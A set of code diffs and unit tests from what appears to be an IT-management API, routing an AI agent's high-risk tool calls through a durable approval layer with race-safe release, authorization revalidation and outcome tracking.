+      vi.mocked(checkGuardrails).mockReturnValue({
+        allowed: true,
+        tier: 3,
+        requiresApproval: true,
+        description: 'Execute command on host-1',
+      } as any);
+      mockInsertReturning({ id: 'exec-2' });
+      mockCreateActionIntent.mockResolvedValue(makeIntentSnapshot({ id: 'intent-2', approvalRequestIds: ['appr-2'] }));
+      mockWaitForIntentDecision.mockResolvedValue('approved');
+      mockTransitionIntent.mockResolvedValue(true);
+      const mockSet = vi.fn(() => ({ where: vi.fn().mockResolvedValue(undefined) }));
+      vi.mocked(db.update).mockReturnValue({ set: mockSet } as any);
+      const session = makeActiveSession({ approvalMode: 'per_step' });
 
-    expect(result).toEqual({ allowed: true });
+      const result = await createSessionPreToolUse(session)('execute_command', { deviceId: 'd-1' });
 
-    // Both inserts fire: ai_tool_executions THEN approval_requests.
-    expect(values).toHaveBeenCalledWith(expect.objectContaining({
-      sessionId: 'session-1',
-      toolName: 'execute_command',
-      status: 'pending',
-    }));
-    expect(values).toHaveBeenCalledWith(expect.objectContaining({
-      userId: 'user-1',
-      executionId: 'exec-1',
-      requestingClientLabel: 'Breeze AI',
-      actionToolName: 'execute_command',
-      riskTier: 'high',
-      status: 'pending',
-    }));
+      expect(result).toEqual({ allowed: true });
+      expect(mockTransitionIntent).toHaveBeenCalledWith('intent-2', 'approved', 'executing', { executedAt: null });
+      // ai_tool_executions ledger row marked executing (the inline path today's UX).
+      expect(mockSet).toHaveBeenCalledWith({ status: 'executing' });
+    });
 
-    // Push dispatched (best-effort).
-    expect(mockGetUserPushTokens).toHaveBeenCalledWith('user-1');
-    expect(mockDispatchApprovalPushToTokens).toHaveBeenCalled();
+    it('does NOT execute inline when the session loses the release CAS to the durable worker (no double execution)', async () => {
+      vi.mocked(checkGuardrails).mockReturnValue({
+        allowed: true,
+        tier: 3,
+        requiresApproval: true,
+        description: 'Execute command',
+      } as any);
+      mockInsertReturning({ id: 'exec-3' });
+      mockCreateActionIntent.mockResolvedValue(makeIntentSnapshot({ id: 'intent-3', approvalRequestIds: ['appr-3'] }));
+      mockWaitForIntentDecision.mockResolvedValue('approved');
+      mockTransitionIntent.mockResolvedValue(false);
+      const session = makeActiveSession({ approvalMode: 'per_step' });
 
-    // SSE event includes BOTH executionId and approvalRequestId.
-    expect(session.eventBus.publish).toHaveBeenCalledWith(expect.objectContaining({
-      type: 'approval_required',
-      executionId: 'exec-1',
-      approvalRequestId: 'exec-1',
-      toolName: 'execute_command',
-      description: 'Execute command on host-1',
-    }));
-  });
+      const result = await createSessionPreToolUse(session)('execute_command', {});
 
-  it('maps tier 2 → medium and tier 3 → high in approval_requests', async () => {
-    // Tier 2 in per_step mode also requires approval.
-    vi.mocked(checkGuardrails).mockReturnValue({
-      allowed: true,
-      tier: 2,
-      requiresApproval: false,
-      description: 'Take screenshot',
-    } as any);
-    const { values } = mockInsertReturning({ id: 'exec-2' });
-    mockGetUserPushTokens.mockResolvedValue([]);
-    vi.mocked(waitForApproval).mockResolvedValue(true);
-    const session = makeActiveSession({ approvalMode: 'per_step' });
+      expect(result).toEqual({
+        allowed: false,
+        error: 'This action is already being completed by the approval worker; it will not run twice.',
+      });
+      expect(mockTransitionIntent).toHaveBeenCalledWith('intent-3', 'approved', 'executing', { executedAt: null });
+      // No inline execution: the "mark as executing" update never fires.
+      expect(db.update).not.toHaveBeenCalled();
+    });
 
-    await createSessionPreToolUse(session)('take_screenshot', { deviceId: 'd-1' });
+    it('returns allowed:false without touching the intent when rejected/cancelled/expired', async () => {
+      vi.mocked(checkGuardrails).mockReturnValue({
+        allowed: true,
+        tier: 3,
+        requiresApproval: true,
+        description: 'Execute command',
+      } as any);
+      mockInsertReturning({ id: 'exec-4' });
+      mockCreateActionIntent.mockResolvedValue(makeIntentSnapshot({ id: 'intent-4', approvalRequestIds: ['appr-4'] }));
+      mockWaitForIntentDecision.mockResolvedValue('expired');
+      const session = makeActiveSession({ approvalMode: 'per_step' });
 
-    expect(values).toHaveBeenCalledWith(expect.objectContaining({
-      executionId: 'exec-2',
-      riskTier: 'medium',
-    }));
+      const result = await createSessionPreToolUse(session)('execute_command', {});
+
+      expect(result).toEqual({ allowed: false, error: 'Tool execution was rejected, cancelled, or expired' });
+      expect(mockTransitionIntent).not.toHaveBeenCalled();
+    });
+
+    it('leaves the intent pending_approval on a chat timeout — durable, no mutation', async () => {
+      vi.mocked(checkGuardrails).mockReturnValue({
+        allowed: true,
+        tier: 3,
+        requiresApproval: true,
+        description: 'Execute command',
+      } as any);
+      mockInsertReturning({ id: 'exec-5' });
+      mockCreateActionIntent.mockResolvedValue(makeIntentSnapshot({ id: 'intent-5', approvalRequestIds: ['appr-5'] }));
+      mockWaitForIntentDecision.mockResolvedValue('pending_approval');
+      const session = makeActiveSession({ approvalMode: 'per_step' });
+
+      const result = await createSessionPreToolUse(session)('execute_command', {});
+
+      expect(result).toEqual({
+        allowed: false,
+        error: 'Approval still pending; this action will complete once approved.',
+      });
+      // The intent is left exactly as-is: no release CAS attempted.
+      expect(mockTransitionIntent).not.toHaveBeenCalled();
+    });
+
+    it('CASes the intent executing -> completed once the inline tool call finishes successfully', async () => {
+      vi.mocked(checkGuardrails).mockReturnValue({
+        allowed: true,
+        tier: 3,
+        requiresApproval: true,
+        description: 'Execute command',
+      } as any);
+      mockInsertReturning({ id: 'exec-6' });
+      mockCreateActionIntent.mockResolvedValue(makeIntentSnapshot({ id: 'intent-6', approvalRequestIds: ['appr-6'] }));
+      mockWaitForIntentDecision.mockResolvedValue('approved');
+      mockTransitionIntent.mockResolvedValue(true);
+      const mockSet = vi.fn(() => ({ where: vi.fn().mockResolvedValue(undefined) }));
+      vi.mocked(db.update).mockReturnValue({ set: mockSet } as any);
+      const session = makeActiveSession({ approvalMode: 'per_step' });
+
+      const preResult = await createSessionPreToolUse(session)('execute_command', {});
+      expect(preResult).toEqual({ allowed: true });
+
+      mockTransitionIntent.mockClear();
+      const postToolUse = createSessionPostToolUse(session);
+      await postToolUse('execute_command', {}, JSON.stringify({ status: 'completed' }), false, 10);
+
+      expect(mockTransitionIntent).toHaveBeenCalledWith('intent-6', 'executing', 'completed', expect.objectContaining({
+        executedAt: expect.any(Date),
+        result: expect.objectContaining({ status: 'completed' }),
+      }));
+    });
+
+    it('CASes the intent executing -> failed with an error code when the inline tool call fails', async () => {
+      vi.mocked(checkGuardrails).mockReturnValue({
+        allowed: true,
+        tier: 3,
+        requiresApproval: true,
+        description: 'Execute command',
+      } as any);
+      mockInsertReturning({ id: 'exec-7' });
+      mockCreateActionIntent.mockResolvedValue(makeIntentSnapshot({ id: 'intent-7', approvalRequestIds: ['appr-7'] }));
+      mockWaitForIntentDecision.mockResolvedValue('approved');
+      mockTransitionIntent.mockResolvedValue(true);
+      const mockSet = vi.fn(() => ({ where: vi.fn().mockResolvedValue(undefined) }));
+      vi.mocked(db.update).mockReturnValue({ set: mockSet } as any);
+      const session = makeActiveSession({ approvalMode: 'per_step' });
+
+      const preResult = await createSessionPreToolUse(session)('execute_command', {});
+      expect(preResult).toEqual({ allowed: true });
+
+      mockTransitionIntent.mockClear();
+      const postToolUse = createSessionPostToolUse(session);
+      await postToolUse('execute_command', {}, JSON.stringify({ error: 'boom' }), true, 10);
+
+      expect(mockTransitionIntent).toHaveBeenCalledWith('intent-7', 'executing', 'failed', expect.objectContaining({
+        executedAt: expect.any(Date),
+        errorCode: 'boom',
+      }));
+    });
+
+    it('does not touch any intent from postToolUse when this session never won an inline release CAS', async () => {
+      // Tier >= 2 so postToolUse takes the update branch that checks
+      // pendingIntentBySession — but preToolUse was never called on this
+      // session (e.g. a Tier-2 auto-approve execution, or a Tier-3 call that
+      // lost the CAS / timed out earlier), so nothing should have been
+      // tracked for it.
+      vi.mocked(checkGuardrails).mockReturnValue({
+        allowed: true,
+        tier: 2,
+        requiresApproval: false,
+      } as any);
+      const mockSet = vi.fn(() => ({ where: vi.fn().mockResolvedValue(undefined) }));
+      vi.mocked(db.update).mockReturnValue({ set: mockSet } as any);
+      mockInsertValues();
+      const session = makeActiveSession();
+      const postToolUse = createSessionPostToolUse(session);
+
+      await postToolUse('take_screenshot', {}, JSON.stringify({ status: 'completed' }), false, 5);
+
+      expect(mockTransitionIntent).not.toHaveBeenCalled();
+    });
   });
 
   it('blocks tools outside the session allowlist before approval handling', async () => {

--- a/apps/api/src/services/aiAgentSdk.ts
+++ b/apps/api/src/services/aiAgentSdk.ts
@@ -45,6 +45,17 @@ const SESSION_IDLE_TIMEOUT_MS = 2 * 60 * 60 * 1000; // 2 hours
  */
 const pendingIntentBySession = new WeakMap<ActiveSession, string>();
 
+/**
+ * Categorized `action_intents.error_code` for the inline (chat-session)
+ * completion CAS below, matching the durable release worker's short-code
+ * style (`tier_escalated`, `execution_lost`, `digest_mismatch`,
+ * `actor_invalid`, `execution_error` — jobs/intentReleaseWorker.ts,
+ * jobs/intentExpiryReaper.ts). `error_code` must stay a stable, bounded
+ * vocabulary a dashboard can group on; the raw tool error text (unbounded,
+ * free-form) goes in `result` instead, never in `error_code`.
+ */
+const INLINE_TOOL_EXECUTION_FAILED_ERROR_CODE = 'tool_execution_failed';
+
 function stripMcpPrefix(toolName: string): string {
   if (!toolName.startsWith('mcp__')) return toolName;
   const separatorIndex = toolName.indexOf('__', 'mcp__'.length);
@@ -933,8 +944,11 @@ export function createSessionPostToolUse(session: ActiveSession): PostToolUseCal
         try {
           await transitionIntent(pendingIntentId, 'executing', isError ? 'failed' : 'completed', {
             executedAt: new Date(),
+            // error_code is always the stable short code (matches the
+            // release worker's vocabulary); the raw tool error text is
+            // unbounded free-form and belongs in `result`, not `error_code`.
             ...(isError
-              ? { errorCode: typeof parsedOutput.error === 'string' ? parsedOutput.error.slice(0, 255) : 'tool_execution_failed' }
+              ? { errorCode: INLINE_TOOL_EXECUTION_FAILED_ERROR_CODE, result: parsedOutput as Record<string, unknown> }
               : { result: parsedOutput as Record<string, unknown> }),
           });
         } catch (err) {

--- a/apps/api/src/services/aiAgentSdk.ts
+++ b/apps/api/src/services/aiAgentSdk.ts
@@ -563,7 +563,30 @@ export function createSessionPreToolUse(session: ActiveSession): PreToolUseCallb
           return { allowed: false, error: 'Failed to create approval record' };
         }
 
-        // Emit approval_required event via session event bus → UI shows Approve/Reject
+        // Stamp the intent link onto the ledger row so handleApproval (web
+        // chat's POST /ai/sessions/:id/approve/:executionId route,
+        // services/aiAgent.ts) can detect this is an intent-backed execution
+        // and refuse to report a self-approval success for it (whole-branch
+        // review CRITICAL-3) — the intents flow is a four-eyes model, decided
+        // via the /approvals surface (mobile push or Approvals queue), never
+        // this endpoint. Stamped before the SSE event below so the row is
+        // already linked by the time the UI could possibly hit approve.
+        try {
+          await withDbAccessContext(
+            { scope: 'organization', orgId: session.orgId, accessibleOrgIds: [session.orgId] },
+            () =>
+              db
+                .update(aiToolExecutions)
+                .set({ intentId: intent.id })
+                .where(eq(aiToolExecutions.id, approvalExec!.id))
+          );
+        } catch (err) {
+          console.error('[AI-SDK] Failed to stamp intent id onto execution:', approvalExec.id, err);
+        }
+
+        // Emit approval_required event via session event bus → UI shows the
+        // "waiting for an approver" state (intentBacked: true — the web chat
+        // card must NOT offer a self-approve button for this execution).
         session.eventBus.publish({
           type: 'approval_required',
           executionId: approvalExec.id,
@@ -572,6 +595,7 @@ export function createSessionPreToolUse(session: ActiveSession): PreToolUseCallb
           input,
           description,
           deviceContext,
+          intentBacked: true,
         });
 
         // Block until an approver decides, OR the chat wait window (still 300s

--- a/apps/api/src/services/aiAgentSdk.ts
+++ b/apps/api/src/services/aiAgentSdk.ts
@@ -9,7 +9,8 @@
  * - safeParseJson(): utility for parsing tool output
  */
 
-import { db, withDbAccessContext } from '../db';
+import { db, withDbAccessContext, withSystemDbAccessContext, runOutsideDbContext } from '../db';
+import { actionIntents } from '../db/schema/actionIntents';
 import { aiSessions, aiMessages, aiToolExecutions, aiActionPlans, devices, deviceSessions, approvalRequests } from '../db/schema';
 import { eq, and, isNull } from 'drizzle-orm';
 import type { AuthContext } from '../middleware/auth';
@@ -27,6 +28,7 @@ import { decideHelperToolAction } from './pamToolActionGovernance';
 import { loadSession, loadConnection } from './m365Helpers';
 import type { DelegantM365ConnectionRow } from '../db/schema/delegant';
 import { createActionIntent, waitForIntentDecision, transitionIntent } from './actionIntents/intentService';
+import { revalidateApprovedIntentForRelease } from './actionIntents/revalidateRelease';
 
 const SESSION_MAX_AGE_MS = 24 * 60 * 60 * 1000; // 24 hours
 const SESSION_IDLE_TIMEOUT_MS = 2 * 60 * 60 * 1000; // 2 hours
@@ -632,7 +634,13 @@ export function createSessionPreToolUse(session: ActiveSession): PreToolUseCallb
         // CURRENT status atomically, so it's correct to attempt it here
         // regardless of which terminal-ish status waitForIntentDecision
         // happened to observe (that read can be stale by the time we get here).
-        const wonRelease = await transitionIntent(intent.id, 'approved', 'executing', { executedAt: null });
+        const wonRelease = await transitionIntent(
+          intent.id,
+          'approved',
+          'executing',
+          { executedAt: null },
+          { requireNotExpired: true },
+        );
         if (!wonRelease) {
           // Lost the race: the release worker (or a duplicate outbox delivery)
           // already claimed this intent for execution. Do NOT run the tool
@@ -641,6 +649,49 @@ export function createSessionPreToolUse(session: ActiveSession): PreToolUseCallb
           return {
             allowed: false,
             error: 'This action is already being completed by the approval worker; it will not run twice.',
+          };
+        }
+
+        // Won the release: re-prove the requester's CURRENT authorization
+        // before executing. The inline path runs the tool under the live
+        // `session.auth` captured when the tool call began — which can be up to
+        // 5 minutes stale by now — so it MUST run the same fail-closed
+        // revalidation the durable worker does (actor still active + still has
+        // access to intent.orgId, org still active, tier not escalated, RBAC
+        // still held). Without this, winning the CAS was a silent bypass of
+        // every durability check the worker enforces. We hold the intent in
+        // `executing` (we won the CAS), so on any failure we CAS it straight to
+        // `failed` with the same error_code the worker uses and refuse to run.
+        const { intentRow, winningApproval } = await runOutsideDbContext(() =>
+          withSystemDbAccessContext(async () => {
+            const [row] = await db
+              .select()
+              .from(actionIntents)
+              .where(eq(actionIntents.id, intent.id))
+              .limit(1);
+            const [approvalRow] = await db
+              .select({ boundArgumentDigest: approvalRequests.boundArgumentDigest })
+              .from(approvalRequests)
+              .where(and(eq(approvalRequests.intentId, intent.id), eq(approvalRequests.status, 'approved')))
+              .limit(1);
+            return { intentRow: row ?? null, winningApproval: approvalRow ?? null };
+          }),
+        );
+
+        if (!intentRow) {
+          console.error(`[AI-SDK] intent ${intent.id} vanished after winning release CAS`);
+          return { allowed: false, error: 'Approved action could not be revalidated for execution.' };
+        }
+
+        const revalidation = await revalidateApprovedIntentForRelease(intentRow, winningApproval);
+        if (!revalidation.ok) {
+          await transitionIntent(intent.id, 'executing', 'failed', { errorCode: revalidation.errorCode });
+          console.error(
+            `[AI-SDK] inline release revalidation failed for intent ${intent.id}: ${revalidation.errorCode}`,
+          );
+          return {
+            allowed: false,
+            error: 'Authorization for this action could no longer be verified; it was not executed.',
           };
         }
 

--- a/apps/api/src/services/aiAgentSdk.ts
+++ b/apps/api/src/services/aiAgentSdk.ts
@@ -10,7 +10,7 @@
  */
 
 import { db, withDbAccessContext } from '../db';
-import { aiSessions, aiMessages, aiToolExecutions, aiActionPlans, devices, deviceSessions, approvalRequests } from '../db/schema';
+import { aiSessions, aiMessages, aiToolExecutions, aiActionPlans, devices, deviceSessions } from '../db/schema';
 import { eq, and, isNull } from 'drizzle-orm';
 import type { AuthContext } from '../middleware/auth';
 import type { AiPageContext, AiApprovalMode } from '@breeze/shared/types/ai';
@@ -22,13 +22,27 @@ import { TOOL_TIERS, type PreToolUseCallback, type PostToolUseCallback } from '.
 import { writeAuditEvent, requestLikeFromSnapshot, type RequestLike } from './auditEvents';
 import type { ActiveSession, AuditSnapshot } from './streamingSessionManager';
 import { compactToolResultForChat } from './aiToolOutput';
-import { dispatchApprovalPushToTokens, getUserPushTokens } from './expoPush';
 import { decideHelperToolAction } from './pamToolActionGovernance';
 import { loadSession, loadConnection } from './m365Helpers';
 import type { DelegantM365ConnectionRow } from '../db/schema/delegant';
+import { createActionIntent, waitForIntentDecision, transitionIntent } from './actionIntents/intentService';
 
 const SESSION_MAX_AGE_MS = 24 * 60 * 60 * 1000; // 24 hours
 const SESSION_IDLE_TIMEOUT_MS = 2 * 60 * 60 * 1000; // 2 hours
+
+/**
+ * Tracks the action_intents.id an inline Tier-3 execution is running under,
+ * so createSessionPostToolUse can CAS it `executing -> completed|failed` once
+ * the tool actually finishes (see the coordination invariant in the T3 block
+ * of createSessionPreToolUse below). Keyed by the ActiveSession object itself
+ * rather than added as a field on the ActiveSession type — this keeps the
+ * action-intents integration local to this module. At most one Tier-3 tool
+ * is ever "executing" for a given session at a time (the same assumption
+ * createSessionPostToolUse's existing sessionId+toolName+status='executing'
+ * match already makes), so a single pending id per session is sufficient.
+ * WeakMap so an evicted/closed session's entry is GC'd with it.
+ */
+const pendingIntentBySession = new WeakMap<ActiveSession, string>();
 
 function stripMcpPrefix(toolName: string): string {
   if (!toolName.startsWith('mcp__')) return toolName;
@@ -405,7 +419,15 @@ export function createSessionPreToolUse(session: ActiveSession): PreToolUseCallb
         // Deviation from plan — fall through to per-step approval
       }
 
-      // Per-step approval flow (default behavior)
+      // Per-step approval flow (default behavior) — Tier 3 chat tools now
+      // route through the durable action-intents layer (spec
+      // docs/superpowers/specs/2026-07-18-action-intents-approval-layer-design.md
+      // §6.1) instead of inserting a bare approval_requests row directly.
+      // ai_tool_executions is still created here as the execution-ledger row
+      // the SSE approval_required event references and the inline-completion
+      // path below (via createSessionPostToolUse) updates to completed/
+      // failed — but the actual approval binding (approver fan-out + push)
+      // now lives on the action_intents row createActionIntent creates.
       let approvalExec: { id: string } | undefined;
       try {
         const [row] = await withDbAccessContext(
@@ -486,22 +508,15 @@ export function createSessionPreToolUse(session: ActiveSession): PreToolUseCallb
         }
       }
 
-      // Bridge to mobile-readable approval_requests row.
-      // Mobile clients read from /api/v1/mobile/approvals/* (NEVER from
-      // ai_tool_executions). The approve/deny route handlers resolve the
-      // execution_id back to the SDK's waitForApproval() poll.
-      //
       // Tier → riskTier mapping (documented in the spec):
       //   Tier 2 → 'medium' (auto-approve still mutates; per_step shows mobile)
       //   Tier 3 → 'high'   (destructive — execute_command, run_script, …)
       //   Tier 4 → 'critical' (blocked at guardrail layer; never reaches here)
       // We don't have a separate "destructive" tier today, so Tier 3 is the
-      // ceiling that actually fires. Pick 'high' as the safe default for
-      // anything unexpected.
+      // ceiling that actually fires. createActionIntent recomputes this same
+      // mapping internally for the approval_requests rows it fans out to;
+      // it's kept here too only to build the SSE description.
       const description = guardrailCheck.description ?? `Execute ${toolName}`;
-      const riskTier: 'medium' | 'high' | 'critical' =
-        guardrailCheck.tier >= 4 ? 'critical' : guardrailCheck.tier >= 3 ? 'high' : 'medium';
-      const actionLabel = description;
       // For M365 mutation tools, enrich the approval card with the customer
       // tenant + target user + reason. Non-fatal: any DB hiccup falls back to
       // the default description rather than throwing into the approval path.
@@ -514,96 +529,88 @@ export function createSessionPreToolUse(session: ActiveSession): PreToolUseCallb
         }
       } catch { /* non-fatal: fall back to default description */ }
       const riskSummary = m365Summary ?? (description.length > 500 ? `${description.slice(0, 497)}...` : description);
-      const expiresAt = new Date(Date.now() + 300_000); // matches waitForApproval timeout
 
-      let approvalRequestId: string | undefined;
+      // Create the durable intent. This fans out to eligible org approvers
+      // (or the sole-operator self-approval row), dispatches mobile push, and
+      // writes the intent_created outbox row — all internally, in one
+      // transaction (services/actionIntents/intentService.ts). Replaces the
+      // old direct approval_requests insert + dispatchApprovalPushToTokens
+      // call: createActionIntent is now the single place that does both.
+      let intent: Awaited<ReturnType<typeof createActionIntent>>;
       try {
-        const [approvalRow] = await withDbAccessContext(
-          {
-            scope: 'organization',
-            orgId: session.orgId,
-            accessibleOrgIds: [session.orgId],
-            userId: session.auth.user.id,
-          },
-          () =>
-            db
-              .insert(approvalRequests)
-              .values({
-                userId: session.auth.user.id,
-                executionId: approvalExec!.id,
-                requestingClientLabel: 'Breeze AI',
-                requestingMachineLabel: null,
-                actionLabel,
-                actionToolName: stripMcpPrefix(toolName),
-                actionArguments: input as Record<string, unknown>,
-                riskTier,
-                riskSummary,
-                status: 'pending',
-                // The chat session's originating OAuth client is not yet
-                // tracked on aiSessions; until that lands, the AI-agent
-                // path can't be a self-loop with the mobile push target.
-                // (deriveIsRecursive() with a null requestingClientId
-                // returns false — explicit here for documentation.)
-                isRecursive: false,
-                expiresAt,
-              })
-              .returning({ id: approvalRequests.id })
-        );
-        approvalRequestId = approvalRow?.id;
+        intent = await createActionIntent(session.auth, {
+          toolName,
+          input: input as Record<string, unknown>,
+          source: 'chat',
+          reason: riskSummary,
+          orgId: session.orgId,
+        });
       } catch (err) {
-        console.error('[AI-SDK] Failed to create mobile approval_request row:', err);
-        // Non-fatal: SSE approval flow still works for in-app web UI even
-        // without the mobile-readable row. The approve/deny handler simply
-        // won't have an executionId to resolve back to.
-      }
-
-      // Best-effort push notification to the user's mobile device(s).
-      if (approvalRequestId) {
-        try {
-          // Token read happens INSIDE the org DB context; the push network
-          // sends run AFTER it closes so we never hold the transaction open
-          // across the round-trip (#1105). dispatchApprovalPushToTokens fans
-          // out across every provider (Expo relay + native APNs).
-          const tokens = await withDbAccessContext(
-            {
-              scope: 'organization',
-              orgId: session.orgId,
-              accessibleOrgIds: [session.orgId],
-              userId: session.auth.user.id,
-            },
-            () => getUserPushTokens(session.auth.user.id),
-          );
-          await dispatchApprovalPushToTokens(tokens, {
-            approvalId: approvalRequestId,
-            actionLabel,
-            requestingClientLabel: 'Breeze AI',
-          });
-        } catch (err) {
-          console.error('[AI-SDK] Failed to dispatch approval push notification:', err);
-        }
+        console.error('[AI-SDK] Failed to create action intent:', toolName, err);
+        return { allowed: false, error: 'Failed to create approval record' };
       }
 
       // Emit approval_required event via session event bus → UI shows Approve/Reject
       session.eventBus.publish({
         type: 'approval_required',
         executionId: approvalExec.id,
-        approvalRequestId,
+        approvalRequestId: intent.approvalRequestIds[0],
         toolName,
         input,
         description,
         deviceContext,
       });
 
-      // Block until user clicks Approve/Reject or 5-min timeout
-      const approved = await waitForApproval(
-        approvalExec.id,
+      // Block until an approver decides, OR the chat wait window (still 300s
+      // — matches the intent's own 5-minute chat expiry) elapses. Unlike the
+      // old waitForApproval, this NEVER mutates the intent on timeout: giving
+      // up here leaves it pending_approval so an approver can still decide it
+      // — and the durable release worker (jobs/intentReleaseWorker.ts) will
+      // execute it — after this session has moved on or died. This is the
+      // new durable capability the design adds (spec §6.1).
+      const decisionStatus = await waitForIntentDecision(
+        intent.id,
         300_000,
         session.abortController.signal,
       );
 
-      if (!approved) {
-        return { allowed: false, error: 'Tool execution was rejected or timed out' };
+      if (decisionStatus === 'pending_approval') {
+        return {
+          allowed: false,
+          error: 'Approval still pending; this action will complete once approved.',
+        };
       }
+
+      if (decisionStatus === 'rejected' || decisionStatus === 'cancelled' || decisionStatus === 'expired') {
+        return { allowed: false, error: 'Tool execution was rejected, cancelled, or expired' };
+      }
+
+      // decisionStatus is one of approved/executing/completed/failed here.
+      // COORDINATION INVARIANT (CRITICAL — prevents double execution): the
+      // durable release worker also consumes the intent_approved outbox and
+      // may already be executing (or have executed/failed) this same intent.
+      // The `approved -> executing` CAS is the SINGLE mutual-exclusion point
+      // between this session and the worker — whichever side wins it is the
+      // only side allowed to run the tool. transitionIntent re-checks the
+      // CURRENT status atomically, so it's correct to attempt it here
+      // regardless of which terminal-ish status waitForIntentDecision
+      // happened to observe (that read can be stale by the time we get here).
+      const wonRelease = await transitionIntent(intent.id, 'approved', 'executing', { executedAt: null });
+      if (!wonRelease) {
+        // Lost the race: the release worker (or a duplicate outbox delivery)
+        // already claimed this intent for execution. Do NOT run the tool
+        // inline — that would double-execute a real side effect. The worker
+        // owns the ledger write and the intent's final result/error_code.
+        return {
+          allowed: false,
+          error: 'This action is already being completed by the approval worker; it will not run twice.',
+        };
+      }
+
+      // Won the release: track the intent id so createSessionPostToolUse can
+      // CAS it executing -> completed|failed once the inline tool call
+      // actually finishes (see pendingIntentBySession above).
+      pendingIntentBySession.set(session, intent.id);
 
       // Mark as executing
       try {
@@ -770,6 +777,29 @@ export function createSessionPostToolUse(session: ActiveSession): PostToolUseCal
       } catch (err) {
         persistenceError = true;
         console.error(`[AI-SDK] Failed to update approval execution record for ${toolName}:`, err instanceof Error ? err.message : err);
+      }
+
+      // 2b-i. Complete the durable intent this inline execution won the
+      // approved -> executing release CAS for (createSessionPreToolUse, T3
+      // block). This is the "real completion hook" the design calls for
+      // (spec §6.1): the intent must reflect ACTUAL completion, not just
+      // authorization to run — CASing it to completed the moment inline
+      // execution is authorized would be wrong, since the tool hasn't run
+      // yet at that point. A lost CAS here just means a reaper or the worker
+      // already terminalized the intent first; nothing more to do.
+      const pendingIntentId = pendingIntentBySession.get(session);
+      if (pendingIntentId) {
+        pendingIntentBySession.delete(session);
+        try {
+          await transitionIntent(pendingIntentId, 'executing', isError ? 'failed' : 'completed', {
+            executedAt: new Date(),
+            ...(isError
+              ? { errorCode: typeof parsedOutput.error === 'string' ? parsedOutput.error.slice(0, 255) : 'tool_execution_failed' }
+              : { result: parsedOutput as Record<string, unknown> }),
+          });
+        } catch (err) {
+          console.error(`[AI-SDK] Failed to CAS action intent to ${isError ? 'failed' : 'completed'} for ${toolName}:`, pendingIntentId, err);
+        }
       }
     }
 

--- a/apps/api/src/services/aiAgentSdk.ts
+++ b/apps/api/src/services/aiAgentSdk.ts
@@ -10,7 +10,7 @@
  */
 
 import { db, withDbAccessContext } from '../db';
-import { aiSessions, aiMessages, aiToolExecutions, aiActionPlans, devices, deviceSessions } from '../db/schema';
+import { aiSessions, aiMessages, aiToolExecutions, aiActionPlans, devices, deviceSessions, approvalRequests } from '../db/schema';
 import { eq, and, isNull } from 'drizzle-orm';
 import type { AuthContext } from '../middleware/auth';
 import type { AiPageContext, AiApprovalMode } from '@breeze/shared/types/ai';
@@ -22,6 +22,7 @@ import { TOOL_TIERS, type PreToolUseCallback, type PostToolUseCallback } from '.
 import { writeAuditEvent, requestLikeFromSnapshot, type RequestLike } from './auditEvents';
 import type { ActiveSession, AuditSnapshot } from './streamingSessionManager';
 import { compactToolResultForChat } from './aiToolOutput';
+import { dispatchApprovalPushToTokens, getUserPushTokens } from './expoPush';
 import { decideHelperToolAction } from './pamToolActionGovernance';
 import { loadSession, loadConnection } from './m365Helpers';
 import type { DelegantM365ConnectionRow } from '../db/schema/delegant';
@@ -419,15 +420,21 @@ export function createSessionPreToolUse(session: ActiveSession): PreToolUseCallb
         // Deviation from plan — fall through to per-step approval
       }
 
-      // Per-step approval flow (default behavior) — Tier 3 chat tools now
+      // Per-step approval flow (default behavior). ONLY Tier 3 chat tools
       // route through the durable action-intents layer (spec
       // docs/superpowers/specs/2026-07-18-action-intents-approval-layer-design.md
-      // §6.1) instead of inserting a bare approval_requests row directly.
+      // §6.1) — createActionIntent throws ActionIntentTierError for anything
+      // below tier 3 (services/actionIntents/intentService.ts), so Tier 2
+      // under per_step keeps the legacy lightweight bridge below (regression
+      // fix: a prior revision routed both tiers through createActionIntent,
+      // which silently failed every Tier-2 per_step approval — see
+      // .superpowers/sdd/task-8-report.md "Fix: tier-2 per_step regression").
       // ai_tool_executions is still created here as the execution-ledger row
       // the SSE approval_required event references and the inline-completion
       // path below (via createSessionPostToolUse) updates to completed/
-      // failed — but the actual approval binding (approver fan-out + push)
-      // now lives on the action_intents row createActionIntent creates.
+      // failed — but for Tier 3 the actual approval binding (approver
+      // fan-out + push) lives on the action_intents row createActionIntent
+      // creates.
       let approvalExec: { id: string } | undefined;
       try {
         const [row] = await withDbAccessContext(
@@ -508,122 +515,255 @@ export function createSessionPreToolUse(session: ActiveSession): PreToolUseCallb
         }
       }
 
-      // Tier → riskTier mapping (documented in the spec):
-      //   Tier 2 → 'medium' (auto-approve still mutates; per_step shows mobile)
-      //   Tier 3 → 'high'   (destructive — execute_command, run_script, …)
-      //   Tier 4 → 'critical' (blocked at guardrail layer; never reaches here)
-      // We don't have a separate "destructive" tier today, so Tier 3 is the
-      // ceiling that actually fires. createActionIntent recomputes this same
-      // mapping internally for the approval_requests rows it fans out to;
-      // it's kept here too only to build the SSE description.
       const description = guardrailCheck.description ?? `Execute ${toolName}`;
-      // For M365 mutation tools, enrich the approval card with the customer
-      // tenant + target user + reason. Non-fatal: any DB hiccup falls back to
-      // the default description rather than throwing into the approval path.
-      let m365Summary: string | null = null;
-      try {
-        const sessRow = await loadSession(session.breezeSessionId);
-        if (sessRow?.delegantM365ConnectionId) {
-          const conn = await loadConnection(sessRow.delegantM365ConnectionId);
-          m365Summary = buildM365RiskSummary(toolName, input as Record<string, unknown>, conn);
+
+      if (guardrailCheck.tier >= 3) {
+        // ---- Tier 3+: durable action-intents flow (spec §6.1) ----
+        // For M365 mutation tools, enrich the approval card with the customer
+        // tenant + target user + reason. Non-fatal: any DB hiccup falls back to
+        // the default description rather than throwing into the approval path.
+        let m365Summary: string | null = null;
+        try {
+          const sessRow = await loadSession(session.breezeSessionId);
+          if (sessRow?.delegantM365ConnectionId) {
+            const conn = await loadConnection(sessRow.delegantM365ConnectionId);
+            m365Summary = buildM365RiskSummary(toolName, input as Record<string, unknown>, conn);
+          }
+        } catch { /* non-fatal: fall back to default description */ }
+        const riskSummary = m365Summary ?? (description.length > 500 ? `${description.slice(0, 497)}...` : description);
+
+        // Create the durable intent. This fans out to eligible org approvers
+        // (or the sole-operator self-approval row), dispatches mobile push, and
+        // writes the intent_created outbox row — all internally, in one
+        // transaction (services/actionIntents/intentService.ts). Replaces the
+        // old direct approval_requests insert + dispatchApprovalPushToTokens
+        // call: createActionIntent is now the single place that does both.
+        let intent: Awaited<ReturnType<typeof createActionIntent>>;
